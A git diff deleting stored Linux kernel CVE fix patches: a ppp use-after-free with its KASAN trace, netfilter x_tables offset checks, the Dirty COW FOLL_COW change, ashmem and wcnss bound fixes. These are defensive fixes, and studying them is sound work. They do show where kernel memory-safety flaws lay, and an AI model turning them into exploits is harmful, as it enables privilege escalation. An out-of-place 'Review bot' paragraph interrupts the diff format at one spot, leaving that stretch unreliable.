- 00000000ffffffff ffff8800662c7790 ffffffff8292049d ffff88003e36a300
- ffff880064e20000 ffff880064e20000 ffff8800662c77c0 ffffffff816f2054
- ffff88003e36a300 ffffea0001938800 ffff880064e20000 0000000000000000
-Call Trace:
- [< inline >] __dump_stack kernel/lib/dump_stack.c:15
- [] dump_stack+0x6f/0xa2 kernel/lib/dump_stack.c:50
- [] print_trailer+0xf4/0x150 kernel/mm/slub.c:654
- [] object_err+0x2f/0x40 kernel/mm/slub.c:661
- [< inline >] print_address_description kernel/mm/kasan/report.c:138
- [] kasan_report_error+0x215/0x530 kernel/mm/kasan/report.c:236
- [< inline >] kasan_report kernel/mm/kasan/report.c:259
- [] __asan_report_load8_noabort+0x3e/0x40 kernel/mm/kasan/report.c:280
- [< inline >] ? ppp_pernet kernel/include/linux/compiler.h:218
- [] ? ppp_unregister_channel+0x372/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [< inline >] ppp_pernet kernel/include/linux/compiler.h:218
- [] ppp_unregister_channel+0x372/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [< inline >] ? ppp_pernet kernel/drivers/net/ppp/ppp_generic.c:293
- [] ? ppp_unregister_channel+0xe6/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [] ppp_asynctty_close+0xa3/0x130 kernel/drivers/net/ppp/ppp_async.c:241
- [] ? async_lcp_peek+0x5b0/0x5b0 kernel/drivers/net/ppp/ppp_async.c:1000
- [] tty_ldisc_close.isra.1+0x99/0xe0 kernel/drivers/tty/tty_ldisc.c:478
- [] tty_ldisc_kill+0x40/0x170 kernel/drivers/tty/tty_ldisc.c:744
- [] tty_ldisc_release+0x1b3/0x260 kernel/drivers/tty/tty_ldisc.c:772
- [] tty_release+0xac1/0x13e0 kernel/drivers/tty/tty_io.c:1901
- [] ? release_tty+0x320/0x320 kernel/drivers/tty/tty_io.c:1688
- [] __fput+0x236/0x780 kernel/fs/file_table.c:208
- [] ____fput+0x15/0x20 kernel/fs/file_table.c:244
- [] task_work_run+0x16b/0x200 kernel/kernel/task_work.c:115
- [< inline >] exit_task_work kernel/include/linux/task_work.h:21
- [] do_exit+0x8b5/0x2c60 kernel/kernel/exit.c:750
- [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123
- [] ? mm_update_next_owner+0x6f0/0x6f0 kernel/kernel/exit.c:357
- [] ? __dequeue_signal+0x136/0x470 kernel/kernel/signal.c:550
- [] ? recalc_sigpending_tsk+0x13b/0x180 kernel/kernel/signal.c:145
- [] do_group_exit+0x108/0x330 kernel/kernel/exit.c:880
- [] get_signal+0x5e4/0x14f0 kernel/kernel/signal.c:2307
- [< inline >] ? kretprobe_table_lock kernel/kernel/kprobes.c:1113
- [] ? kprobe_flush_task+0xb5/0x450 kernel/kernel/kprobes.c:1158
- [] do_signal+0x83/0x1c90 kernel/arch/x86/kernel/signal.c:712
- [] ? recycle_rp_inst+0x310/0x310 kernel/include/linux/list.h:655
- [] ? setup_sigcontext+0x780/0x780 kernel/arch/x86/kernel/signal.c:165
- [] ? finish_task_switch+0x424/0x5f0 kernel/kernel/sched/core.c:2692
- [< inline >] ? finish_lock_switch kernel/kernel/sched/sched.h:1099
- [] ? finish_task_switch+0x120/0x5f0 kernel/kernel/sched/core.c:2678
- [< inline >] ? context_switch kernel/kernel/sched/core.c:2807
- [] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283
- [] exit_to_usermode_loop+0xf1/0x1a0 kernel/arch/x86/entry/common.c:247
- [< inline >] prepare_exit_to_usermode kernel/arch/x86/entry/common.c:282
- [] syscall_return_slowpath+0x19f/0x210 kernel/arch/x86/entry/common.c:344
- [] int_ret_from_sys_call+0x25/0x9f kernel/arch/x86/entry/entry_64.S:281
-Memory state around the buggy address:
- ffff880064e21680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880064e21700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
->ffff880064e21780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ^
- ffff880064e21800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880064e21880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-==================================================================
-
-Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
-Reported-by: Baozeng Ding
-Signed-off-by: Guillaume Nault
-Reviewed-by: Cyrill Gorcunov
-Signed-off-by: David S. Miller
----
- drivers/net/ppp/ppp_generic.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
-index 4fd8610..f572b31 100644
---- a/drivers/net/ppp/ppp_generic.c
-+++ b/drivers/net/ppp/ppp_generic.c
-@@ -2307,7 +2307,7 @@ int ppp_register_net_channel(struct net *net, struct ppp_channel *chan)
-
- pch->ppp = NULL;
- pch->chan = chan;
-- pch->chan_net = net;
-+ pch->chan_net = get_net(net);
- chan->ppp = pch;
- init_ppp_file(&pch->file, CHANNEL);
- pch->file.hdrlen = chan->hdrlen;
-@@ -2404,6 +2404,8 @@ ppp_unregister_channel(struct ppp_channel *chan)
- spin_lock_bh(&pn->all_channels_lock);
- list_del(&pch->list);
- spin_unlock_bh(&pn->all_channels_lock);
-+ put_net(pch->chan_net);
-+ pch->chan_net = NULL;
-
- pch->file.dead = 1;
- wake_up_interruptible(&pch->file.rwait);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch
deleted file mode 100644
index 37e46d21..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch
+++ /dev/null
@@ -1,200 +0,0 @@
-From bdf533de6968e9686df777dc178486f600c6e617 Mon Sep 17 00:00:00 2001
-From: Florian Westphal
-Date: Tue, 22 Mar 2016 18:02:49 +0100
-Subject: netfilter: x_tables: validate e->target_offset early
-
-We should check that e->target_offset is sane before
-mark_source_chains gets called since it will fetch the target entry
-for loop detection.
-
-Signed-off-by: Florian Westphal
-Signed-off-by: Pablo Neira Ayuso
----
- net/ipv4/netfilter/arp_tables.c | 17 ++++++++---------
- net/ipv4/netfilter/ip_tables.c | 17 ++++++++---------
- net/ipv6/netfilter/ip6_tables.c | 17 ++++++++---------
- 3 files changed, 24 insertions(+), 27 deletions(-)
-
-diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
-index bf08192..830bbe8 100644
---- a/net/ipv4/netfilter/arp_tables.c
-+++ b/net/ipv4/netfilter/arp_tables.c
-@@ -474,14 +474,12 @@ next:
- return 1;
- }
-
--static inline int check_entry(const struct arpt_entry *e, const char *name)
-+static inline int check_entry(const struct arpt_entry *e)
- {
- const struct xt_entry_target *t;
-
-- if (!arp_checkentry(&e->arp)) {
-- duprintf("arp_tables: arp check failed %p %s.\n", e, name);
-+ if (!arp_checkentry(&e->arp))
- return -EINVAL;
-- }
-
- if (e->target_offset + sizeof(struct xt_entry_target) > e->next_offset)
- return -EINVAL;
-@@ -522,10 +520,6 @@ find_check_entry(struct arpt_entry *e, const char *name, unsigned int size)
- struct xt_target *target;
- int ret;
-
-- ret = check_entry(e, name);
-- if (ret)
-- return ret;
--
- e->counters.pcnt = xt_percpu_counter_alloc();
- if (IS_ERR_VALUE(e->counters.pcnt))
- return -ENOMEM;
-@@ -576,6 +570,7 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- unsigned int valid_hooks)
- {
- unsigned int h;
-+ int err;
-
- if ((unsigned long)e % __alignof__(struct arpt_entry) != 0 ||
- (unsigned char *)e + sizeof(struct arpt_entry) >= limit) {
-@@ -590,6 +585,10 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- return -EINVAL;
- }
-
-+ err = check_entry(e);
-+ if (err)
-+ return err;
-+
- /* Check hooks & underflows */
- for (h = 0; h < NF_ARP_NUMHOOKS; h++) {
- if (!(valid_hooks & (1 << h)))
-@@ -1246,7 +1245,7 @@ check_compat_entry_size_and_hooks(struct compat_arpt_entry *e,
- }
-
- /* For purposes of check_entry casting the compat entry is fine */
-- ret = check_entry((struct arpt_entry *)e, name);
-+ ret = check_entry((struct arpt_entry *)e);
- if (ret)
- return ret;
-
-diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
-index e53f8d6..1d72a3c 100644
---- a/net/ipv4/netfilter/ip_tables.c
-+++ b/net/ipv4/netfilter/ip_tables.c
-@@ -569,14 +569,12 @@ static void cleanup_match(struct xt_entry_match *m, struct net *net)
- }
-
- static int
--check_entry(const struct ipt_entry *e, const char *name)
-+check_entry(const struct ipt_entry *e)
- {
- const struct xt_entry_target *t;
-
-- if (!ip_checkentry(&e->ip)) {
-- duprintf("ip check failed %p %s.\n", e, name);
-+ if (!ip_checkentry(&e->ip))
- return -EINVAL;
-- }
-
- if (e->target_offset + sizeof(struct xt_entry_target) >
- e->next_offset)
-@@ -666,10 +664,6 @@ find_check_entry(struct ipt_entry *e, struct net *net, const char *name,
- struct xt_mtchk_param mtpar;
- struct xt_entry_match *ematch;
-
-- ret = check_entry(e, name);
-- if (ret)
-- return ret;
--
- e->counters.pcnt = xt_percpu_counter_alloc();
- if (IS_ERR_VALUE(e->counters.pcnt))
- return -ENOMEM;
-@@ -741,6 +735,7 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- unsigned int valid_hooks)
- {
- unsigned int h;
-+ int err;
-
- if ((unsigned long)e % __alignof__(struct ipt_entry) != 0 ||
- (unsigned char *)e + sizeof(struct ipt_entry) >= limit) {
-@@ -755,6 +750,10 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- return -EINVAL;
- }
-
-+ err = check_entry(e);
-+ if (err)
-+ return err;
-+
- /* Check hooks & underflows */
- for (h = 0; h < NF_INET_NUMHOOKS; h++) {
- if (!(valid_hooks & (1 << h)))
-@@ -1506,7 +1505,7 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e,
- }
-
- /* For purposes of check_entry casting the compat entry is fine */
-- ret = check_entry((struct ipt_entry *)e, name);
-+ ret = check_entry((struct ipt_entry *)e);
- if (ret)
- return ret;
-
-diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
-index 84f9baf..26a5ad1 100644
---- a/net/ipv6/netfilter/ip6_tables.c
-+++ b/net/ipv6/netfilter/ip6_tables.c
-@@ -581,14 +581,12 @@ static void cleanup_match(struct xt_entry_match *m, struct net *net)
- }
-
- static int
--check_entry(const struct ip6t_entry *e, const char *name)
-+check_entry(const struct ip6t_entry *e)
- {
- const struct xt_entry_target *t;
-
-- if (!ip6_checkentry(&e->ipv6)) {
-- duprintf("ip_tables: ip check failed %p %s.\n", e, name);
-+ if (!ip6_checkentry(&e->ipv6))
- return -EINVAL;
-- }
-
- if (e->target_offset + sizeof(struct xt_entry_target) >
- e->next_offset)
-@@ -679,10 +677,6 @@ find_check_entry(struct ip6t_entry *e, struct net *net, const char *name,
- struct xt_mtchk_param mtpar;
- struct xt_entry_match *ematch;
-
-- ret = check_entry(e, name);
-- if (ret)
-- return ret;
--
- e->counters.pcnt = xt_percpu_counter_alloc();
- if (IS_ERR_VALUE(e->counters.pcnt))
- return -ENOMEM;
-@@ -753,6 +747,7 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- unsigned int valid_hooks)
- {
- unsigned int h;
-+ int err;
-
- if ((unsigned long)e % __alignof__(struct ip6t_entry) != 0 ||
- (unsigned char *)e + sizeof(struct ip6t_entry) >= limit) {
-@@ -767,6 +762,10 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- return -EINVAL;
- }
-
-+ err = check_entry(e);
-+ if (err)
-+ return err;
-+
- /* Check hooks & underflows */
- for (h = 0; h < NF_INET_NUMHOOKS; h++) {
- if (!(valid_hooks & (1 << h)))
-@@ -1518,7 +1517,7 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e,
- }
-
- /* For purposes of check_entry casting the compat entry is fine */
-- ret = check_entry((struct ip6t_entry *)e, name);
-+ ret = check_entry((struct ip6t_entry *)e);
- if (ret)
- return ret;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch
deleted file mode 100644
index 8b21bbdb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91 Mon Sep 17 00:00:00 2001
-From: Florian Westphal
-Date: Tue, 22 Mar 2016 18:02:50 +0100
-Subject: netfilter: x_tables: make sure e->next_offset covers remaining blob
- size
-
-Otherwise this function may read data beyond the ruleset blob.
-
-Signed-off-by: Florian Westphal
-Signed-off-by: Pablo Neira Ayuso
----
- net/ipv4/netfilter/arp_tables.c | 6 ++++--
- net/ipv4/netfilter/ip_tables.c | 6 ++++--
- net/ipv6/netfilter/ip6_tables.c | 6 ++++--
- 3 files changed, 12 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
-index 830bbe8..51d4fe5 100644
---- a/net/ipv4/netfilter/arp_tables.c
-+++ b/net/ipv4/netfilter/arp_tables.c
-@@ -573,7 +573,8 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- int err;
-
- if ((unsigned long)e % __alignof__(struct arpt_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct arpt_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct arpt_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p\n", e);
- return -EINVAL;
- }
-@@ -1232,7 +1233,8 @@ check_compat_entry_size_and_hooks(struct compat_arpt_entry *e,
-
- duprintf("check_compat_entry_size_and_hooks %p\n", e);
- if ((unsigned long)e % __alignof__(struct compat_arpt_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct compat_arpt_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct compat_arpt_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p, limit = %p\n", e, limit);
- return -EINVAL;
- }
-diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
-index 1d72a3c..fb7694e6 100644
---- a/net/ipv4/netfilter/ip_tables.c
-+++ b/net/ipv4/netfilter/ip_tables.c
-@@ -738,7 +738,8 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- int err;
-
- if ((unsigned long)e % __alignof__(struct ipt_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct ipt_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct ipt_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p\n", e);
- return -EINVAL;
- }
-@@ -1492,7 +1493,8 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e,
-
- duprintf("check_compat_entry_size_and_hooks %p\n", e);
- if ((unsigned long)e % __alignof__(struct compat_ipt_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct compat_ipt_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct compat_ipt_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p, limit = %p\n", e, limit);
- return -EINVAL;
- }
-diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
-index 26a5ad1..b248528f 100644
---- a/net/ipv6/netfilter/ip6_tables.c
-+++ b/net/ipv6/netfilter/ip6_tables.c
-@@ -750,7 +750,8 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- int err;
-
- if ((unsigned long)e % __alignof__(struct ip6t_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct ip6t_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct ip6t_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p\n", e);
- return -EINVAL;
- }
-@@ -1504,7 +1505,8 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e,
-
- duprintf("check_compat_entry_size_and_hooks %p\n", e);
- if ((unsigned long)e % __alignof__(struct compat_ip6t_entry) != 0 ||
-- (unsigned char *)e + sizeof(struct compat_ip6t_entry) >= limit) {
-+ (unsigned char *)e + sizeof(struct compat_ip6t_entry) >= limit ||
-+ (unsigned char *)e + e->next_offset > limit) {
- duprintf("Bad offset %p, limit = %p\n", e, limit);
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch
deleted file mode 100644
index b4d3fc9c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 9691eac5593ff1e2f82391ad327f21d90322aec1 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds
-Date: Thu, 13 Oct 2016 13:07:36 -0700
-Subject: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
-
-commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
-
-This is an ancient bug that was actually attempted to be fixed once
-(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
-get_user_pages() race for write access") but that was then undone due to
-problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
-
-In the meantime, the s390 situation has long been fixed, and we can now
-fix it by checking the pte_dirty() bit properly (and do it better). The
-s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
-software dirty bits") which made it into v3.9. Earlier kernels will
-have to look at the page state itself.
-
-Also, the VM has become more scalable, and what used a purely
-theoretical race back then has become easier to trigger.
-
-To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
-we already did a COW" rather than play racy games with FOLL_WRITE that
-is very fundamental, and then use the pte dirty flag to validate that
-the FOLL_COW flag is still valid.
-
-Reported-and-tested-by: Phil "not Paul" Oester
-Acked-by: Hugh Dickins
-Reviewed-by: Michal Hocko
-Cc: Andy Lutomirski
-Cc: Kees Cook
-Cc: Oleg Nesterov
-Cc: Willy Tarreau
-Cc: Nick Piggin
-Cc: Greg Thelen
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
-[wt: s/gup.c/memory.c; s/follow_page_pte/follow_page_mask;
- s/faultin_page/__get_user_page]
-Signed-off-by: Willy Tarreau
----
- include/linux/mm.h | 1 +
- mm/memory.c | 14 ++++++++++++--
- 2 files changed, 13 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 53b0d70..55590f4 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1715,6 +1715,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
- #define FOLL_HWPOISON 0x100 /* check page is hwpoisoned */
- #define FOLL_NUMA 0x200 /* force NUMA hinting page fault */
- #define FOLL_MIGRATION 0x400 /* wait for page to replace migration entry */
-+#define FOLL_COW 0x4000 /* internal GUP flag */
-
- typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
- void *data);
-diff --git a/mm/memory.c b/mm/memory.c
-index 10cdade..2ca2ee1 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -1462,6 +1462,16 @@ int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
- }
- EXPORT_SYMBOL_GPL(zap_vma_ptes);
-
-+/*
-+ * FOLL_FORCE can write to even unwritable pte's, but only
-+ * after we've gone through a COW cycle and they are dirty.
-+ */
-+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-+{
-+ return pte_write(pte) ||
-+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
-+}
-+
- /**
- * follow_page_mask - look up a page descriptor from a user-virtual address
- * @vma: vm_area_struct mapping @address
-@@ -1569,7 +1579,7 @@ split_fallthrough:
- }
- if ((flags & FOLL_NUMA) && pte_numa(pte))
- goto no_page;
-- if ((flags & FOLL_WRITE) && !pte_write(pte))
-+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
- goto unlock;
-
- page = vm_normal_page(vma, address, pte);
-@@ -1877,7 +1887,7 @@ long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
- */
- if ((ret & VM_FAULT_WRITE) &&
- !(vma->vm_flags & VM_WRITE))
-- foll_flags &= ~FOLL_WRITE;
-+ foll_flags |= FOLL_COW;
-
- cond_resched();
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch
deleted file mode 100644
index c1b8aea7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From e45a502bdeae5a075257c4f061d1ff4ff0821354 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds
-Date: Thu, 13 Oct 2016 13:07:36 -0700
-Subject: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
-
-[ Upstream commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 ]
-
-This is an ancient bug that was actually attempted to be fixed once
-(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
-get_user_pages() race for write access") but that was then undone due to
-problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
-
-In the meantime, the s390 situation has long been fixed, and we can now
-fix it by checking the pte_dirty() bit properly (and do it better). The
-s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
-software dirty bits") which made it into v3.9. Earlier kernels will
-have to look at the page state itself.
-
-Also, the VM has become more scalable, and what used a purely
-theoretical race back then has become easier to trigger.
-
-To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
-we already did a COW" rather than play racy games with FOLL_WRITE that
-is very fundamental, and then use the pte dirty flag to validate that
-the FOLL_COW flag is still valid.
-
-Reported-and-tested-by: Phil "not Paul" Oester
-Acked-by: Hugh Dickins
-Reviewed-by: Michal Hocko
-Cc: Andy Lutomirski
-Cc: Kees Cook
-Cc: Oleg Nesterov
-Cc: Willy Tarreau
-Cc: Nick Piggin
-Cc: Greg Thelen
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
-Signed-off-by: Sasha Levin
----
- include/linux/mm.h | 1 +
- mm/gup.c | 14 ++++++++++++--
- 2 files changed, 13 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 9eef3a1..db853de 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -2029,6 +2029,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
- #define FOLL_NUMA 0x200 /* force NUMA hinting page fault */
- #define FOLL_MIGRATION 0x400 /* wait for page to replace migration entry */
- #define FOLL_TRIED 0x800 /* a retry, previous pass started an IO */
-+#define FOLL_COW 0x4000 /* internal GUP flag */
-
- typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
- void *data);
-diff --git a/mm/gup.c b/mm/gup.c
-index 377a5a7..3cec4df 100644
---- a/mm/gup.c
-+++ b/mm/gup.c
-@@ -32,6 +32,16 @@ static struct page *no_page_table(struct vm_area_struct *vma,
- return NULL;
- }
-
-+/*
-+ * FOLL_FORCE can write to even unwritable pte's, but only
-+ * after we've gone through a COW cycle and they are dirty.
-+ */
-+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-+{
-+ return pte_write(pte) ||
-+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
-+}
-+
- static struct page *follow_page_pte(struct vm_area_struct *vma,
- unsigned long address, pmd_t *pmd, unsigned int flags)
- {
-@@ -66,7 +76,7 @@ retry:
- }
- if ((flags & FOLL_NUMA) && pte_numa(pte))
- goto no_page;
-- if ((flags & FOLL_WRITE) && !pte_write(pte)) {
-+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
- pte_unmap_unlock(ptep, ptl);
- return NULL;
- }
-@@ -315,7 +325,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
- * reCOWed by userspace write).
- */
- if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
-- *flags &= ~FOLL_WRITE;
-+ *flags |= FOLL_COW;
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch
deleted file mode 100644
index a2e3ed84..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch
+++ /dev/null
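Review bot: In the embedded mm.h hunk `FOLL_COW` is documented only as `/* internal GUP flag */`, and nothing in these hunks prevents a caller-supplied `flags` value from already carrying the bit when it reaches can_follow_write_pte(). Because the helper accepts FOLL_FORCE plus FOLL_COW plus a dirty pte as permission to follow a read-only mapping for write, the comment should state who sets the bit and that callers must never pass it, for example `/* internal: set only by faultin_page() after a COW fault; never passed in by callers */`. Any other lookup path that tests FOLL_WRITE against a write-permission bit (none is visible in this patch) would need to go through the same helper rather than a bare writability test.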
@@ -1,82 +0,0 @@
-From 06e51489061e5473b4e2035c79dcf7c27a6f75a6 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Wed, 22 Jun 2016 14:45:31 +0530
-Subject: ashmem: Validate ashmem memory with fops pointer
-
-Validate the ashmem memory entry against f_op pointer
-rather then comparing its name with path of the dentry.
-
-This is to avoid any invalid access to ashmem area in cases
-where some one deliberately set the dentry name to /ashmem.
-
-Change-Id: I74e50cd244f68cb13009cf2355e528485f4de34b
-Signed-off-by: Sunil Khatri
----
- drivers/staging/android/ashmem.c | 42 +++++++++++++++++++---------------------
- 1 file changed, 20 insertions(+), 22 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index 808acd4..ee79ac8 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -766,11 +766,28 @@ static long compat_ashmem_ioctl(struct file *file, unsigned int cmd, unsigned lo
- }
- #endif
-
-+static const struct file_operations ashmem_fops = {
-+ .owner = THIS_MODULE,
-+ .open = ashmem_open,
-+ .release = ashmem_release,
-+ .read = ashmem_read,
-+ .llseek = ashmem_llseek,
-+ .mmap = ashmem_mmap,
-+ .unlocked_ioctl = ashmem_ioctl,
-+#ifdef CONFIG_COMPAT
-+ .compat_ioctl = compat_ashmem_ioctl,
-+#endif
-+};
-+
-+static struct miscdevice ashmem_misc = {
-+ .minor = MISC_DYNAMIC_MINOR,
-+ .name = "ashmem",
-+ .fops = &ashmem_fops,
-+};
-+
- static int is_ashmem_file(struct file *file)
- {
-- char fname[256], *name;
-- name = dentry_path(file->f_dentry, fname, 256);
-- return strcmp(name, "/ashmem") ? 0 : 1;
-+ return (file->f_op == &ashmem_fops);
- }
-
- int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
-@@ -819,25 +836,6 @@ void put_ashmem_file(struct file *file)
- }
- EXPORT_SYMBOL(put_ashmem_file);
-
--static const struct file_operations ashmem_fops = {
-- .owner = THIS_MODULE,
-- .open = ashmem_open,
-- .release = ashmem_release,
-- .read = ashmem_read,
-- .llseek = ashmem_llseek,
-- .mmap = ashmem_mmap,
-- .unlocked_ioctl = ashmem_ioctl,
--#ifdef CONFIG_COMPAT
-- .compat_ioctl = compat_ashmem_ioctl,
--#endif
--};
--
--static struct miscdevice ashmem_misc = {
-- .minor = MISC_DYNAMIC_MINOR,
-- .name = "ashmem",
-- .fops = &ashmem_fops,
--};
--
- static int __init ashmem_init(void)
- {
- int ret;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch
deleted file mode 100644
index fe78befc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5342/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 579e796cb089324c55e0e689a180575ba81b23d9 Mon Sep 17 00:00:00 2001
-From: Anand Kumar
-Date: Tue, 21 Jun 2016 17:36:05 +0530
-Subject: wcnss: Avoid user buffer overloading for write cal data
-
-compare size of allocated cal data buffer from heap
-and count bytes provided to write by user to avoid
-heap overflow for write cal data.
-
-Change-Id: Id70c3230f761385489e5e94c613f4519239dfb1f
-CRs-Fixed: 1032174
-Signed-off-by: Anand Kumar
----
- drivers/net/wireless/wcnss/wcnss_wlan.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/net/wireless/wcnss/wcnss_wlan.c b/drivers/net/wireless/wcnss/wcnss_wlan.c
-index 86f3a48..3f9eeab 100644
---- a/drivers/net/wireless/wcnss/wcnss_wlan.c
-+++ b/drivers/net/wireless/wcnss/wcnss_wlan.c
-@@ -3339,7 +3339,7 @@ static ssize_t wcnss_wlan_write(struct file *fp, const char __user
- return -EFAULT;
-
- if ((UINT32_MAX - count < penv->user_cal_rcvd) ||
-- MAX_CALIBRATED_DATA_SIZE < count + penv->user_cal_rcvd) {
-+ (penv->user_cal_exp_size < count + penv->user_cal_rcvd)) {
- pr_err(DEVICE " invalid size to write %zu\n", count +
- penv->user_cal_rcvd);
- rc = -ENOMEM;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch
